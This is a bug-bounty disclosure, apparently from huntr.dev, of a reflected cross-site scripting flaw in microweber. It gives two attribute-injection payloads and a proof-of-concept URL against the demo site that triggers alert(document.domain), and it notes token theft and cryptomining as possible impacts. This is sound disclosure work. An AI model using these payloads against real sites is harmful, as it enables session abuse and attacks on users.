Lucene search

K
huntrR0hansh529B65C0-5BE7-49D4-9419-F905B8153D31
HistoryJan 02, 2022 - 12:01 p.m.

Cross-site Scripting (XSS) - Reflected in microweber/microweber

2022-01-0212:01:55
r0hansh
www.huntr.dev
14
xss vulnerability
cross-site scripting
arbitrary code execution
browser
csrf token
javascript
security document
microweber
impact
payload
proof of concept
web security

EPSS

0.001

Percentile

43.5%

Description

XSS - Cross-Site Scripting is vulnerability which allows attackers to execute arbitrary javascript code in the browser of victim.

PAYLOAD for firefox: a' onafterscriptexecute=alert(document.domain) c='a (requires NO user-interaction)

PAYLOAD for all major browsers: a' onclick=alert(document.domain) c='a (requires user-interaction)

NOTE: I’m using firefox, so I used the first payload in the PoC. You can refer to https://portswigger.net/web-security/cross-site-scripting/cheat-sheet to know which xss payloads can be triggered in other browsers

Proof of Concept

  1. On firefox browser, visit

https://demo.microweber.org/demo/module/?module=admin%2Fmodules%2Fmanage&id=zaasdasdasd"+onmousemove%3dalert(1)+cc="asd&data-show-ui=admin&class=a%27+onafterscriptexecute%3dalert(document.domain)+c%20%3d'aa&from_url=https://demo.microweber.org

XSS alert will pop-up showing the domain name.

Impact

The attacker can execute any arbitrary javascript code and acheive the following:

  1. Steal CSRF token of the users and do any unintended actions on their behalf like buy a product etc.
  2. Execute malicious javascript e.g. crypto miners

and many more…

EPSS

0.001

Percentile

43.5%

Related for 529B65C0-5BE7-49D4-9419-F905B8153D31